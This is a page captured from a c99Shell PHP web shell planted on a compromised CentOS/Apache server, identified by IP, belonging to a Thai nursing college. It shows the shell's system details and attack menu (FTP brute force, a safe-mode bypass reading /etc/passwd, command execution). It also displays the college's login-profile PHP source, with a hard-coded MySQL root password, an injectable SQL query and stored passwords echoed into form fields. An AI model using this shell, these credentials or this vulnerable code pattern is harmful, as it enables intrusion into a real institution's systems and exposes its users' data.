110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/bcnu_login/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/bcnu_login/ drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?

    session_start();

    if($_SESSION['UserID'] == "")

    {

        echo "Please Login!";

        exit();

    }

    

    mysql_connect("localhost","root","@14012518");

    mysql_select_db("bcnu_login");

    $strSQL = "SELECT * FROM member WHERE UserID = '".$_SESSION['UserID']."' ";

    $objQuery = mysql_query($strSQL);

    $objResult = mysql_fetch_array($objQuery);

?>

<html>

<head>

<title>วิทยาลัยพยาบาลบรมราชชนนี อุดรธานี </title>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>

<body>

<form name="form1" method="post" action="save_profile.php">

  Edit Profile! <br>

  <table width="400" border="1" style="width: 400px">

    <tbody>

      <tr>

        <td width="125"> &nbsp;UserID</td>

        <td width="180">

          <?=$objResult["UserID"];?>

        </td>

      </tr>

      <tr>

        <td> &nbsp;Username</td>

        <td>

          <?=$objResult["Username"];?>

        </td>

      </tr>

      <tr>

        <td> &nbsp;Password</td>

        <td><input name="txtPassword" type="password" id="txtPassword" value="<?=$objResult["Password"];?>">

        </td>

      </tr>

      <tr>

        <td> &nbsp;Confirm Password</td>

        <td><input name="txtConPassword" type="password" id="txtConPassword" value="<?=$objResult["Password"];?>">

        </td>

      </tr>

      <tr>

        <td>&nbsp;Name</td>

        <td><input name="txtName" type="text" id="txtName" value="<?=$objResult["Name"];?>"></td>

      </tr>

      <tr>

        <td> &nbsp;Status</td>

        <td>

          <?=$objResult["Status"];?>

        </td>

      </tr>

    </tbody>

  </table>

  <br>

  <input type="submit" name="Submit" value="Save">

</form>

</body>

</html>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: